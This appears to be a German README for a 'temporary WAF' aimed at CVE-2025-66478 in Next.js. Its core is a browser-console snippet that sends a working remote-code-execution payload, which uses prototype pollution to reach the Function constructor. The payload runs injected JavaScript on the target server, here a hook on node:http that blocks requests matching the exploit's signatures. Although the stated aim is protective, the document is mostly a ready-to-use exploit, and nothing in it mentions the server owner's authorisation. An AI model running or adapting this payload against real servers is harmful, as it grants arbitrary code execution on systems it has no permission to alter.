
Helfen wir mit, Websites sicher zu halten, bis sie richtig gepatcht sind!
Einfacher, temporärer WAF-Schutz-Tester, der auf eine bestimmte Payload-Sequenz abzielt.
Helfen wir Websites, sicher zu bleiben, bis sie ordnungsgemäß gepatcht sind!
Schützt vor CVE-2025-66478, indem Anfragen erkannt und blockiert werden, die bestimmte Payload-Signaturen enthalten. Dies sollte legitimen Traffic nicht beeinträchtigen und Websites retten, die nicht ordnungsgemäß gewartet werden.
Und es setzt sich nach einem Neustart zurück, ist also keine dauerhafte Lösung
python main.py
python main.py http://example.com/
Ja, führen Sie es direkt in der Browserkonsole aus:
const formData = new FormData();
const actionPayload = {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"throw(async()=>{const t=await import(\"node:http\"),e=t.IncomingMessage.prototype.emit;t.IncomingMessage.prototype.emit=function(t,...n){if(\"data\"===t&&n.length>0){const t=this.headers[\"content-type\"]||\"\";if(t.includes(\"multipart\")||t.includes(\"json\")||t.includes(\"text\")){const t=n[0].toString(\"utf8\");if(t.includes('\"then\":\"$1:__proto__:then\"')||t.includes('\"get\":\"$1:constructor:constructor\"')){const t=this.socket._httpMessage;if(t&&!t.headersSent)try{return t.writeHead(500,{\"Content-Type\":\"text/plain; charset=utf-8\",Connection:\"close\",\"X-Powered-By\":\"Next.js\"}),t.end('0:{\"a\":\"$@1\",\"f\":\"\",\"b\":\"cwwYVM2ZWm4vgZG3xVPfk\"}\\n1:E{\"digest\":\"2494231801\"}',(()=>this.destroy())),!1}catch(t){this.destroy()}else this.destroy();return!1}}}return e.apply(this,arguments)}})(),Object.assign(new Error(\"x\"),{digest:\"WAF Installed\"});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
formData.append("0", JSON.stringify(actionPayload));
formData.append("1", '"$@0"');
formData.append("2", "[]");
fetch("/", {
method: "POST",
body: formData,
headers: {
"Next-Action": "x",
}
})
.then(async res => console.log(await res.text()));